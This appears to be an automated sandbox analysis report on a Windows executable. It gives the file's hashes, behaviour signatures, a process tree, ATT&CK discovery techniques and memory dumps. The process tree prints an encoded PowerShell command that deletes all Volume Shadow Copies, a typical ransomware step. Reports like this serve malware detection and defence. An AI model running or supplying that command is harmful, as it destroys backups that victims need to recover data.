Analysis

  • max time kernel
    166s
  • max time network
    160s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:11

General

  • Target

    bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe

  • Size

    164KB

  • MD5

    d451ce07fc15ee0527f68c2d99b1a934

  • SHA1

    bb6d370e27761b1e48a09e197f8babb829343009

  • SHA256

    bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1

  • SHA512

    4ca1c377245edddf131d198ca9453087433c545532a71da6769f17083758691c95873c206ff82c2944343c17ce9877048225d13cf4efed7e5000cb75b5e960b7

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe
    "C:\Users\Admin\AppData\Local\Temp\bc07f137cfd2c041d642620e54ef7b39e75c3745c1d38e92125fd8c4092d6cc1.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2276
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:496
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:848

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2276-123-0x000002D6E65B0000-0x000002D6E65D2000-memory.dmp
      Filesize

      136KB

    • memory/2276-126-0x000002D6E6640000-0x000002D6E6642000-memory.dmp
      Filesize

      8KB

    • memory/2276-127-0x000002D6E6643000-0x000002D6E6645000-memory.dmp
      Filesize

      8KB

    • memory/2276-129-0x000002D6E88A0000-0x000002D6E8916000-memory.dmp
      Filesize

      472KB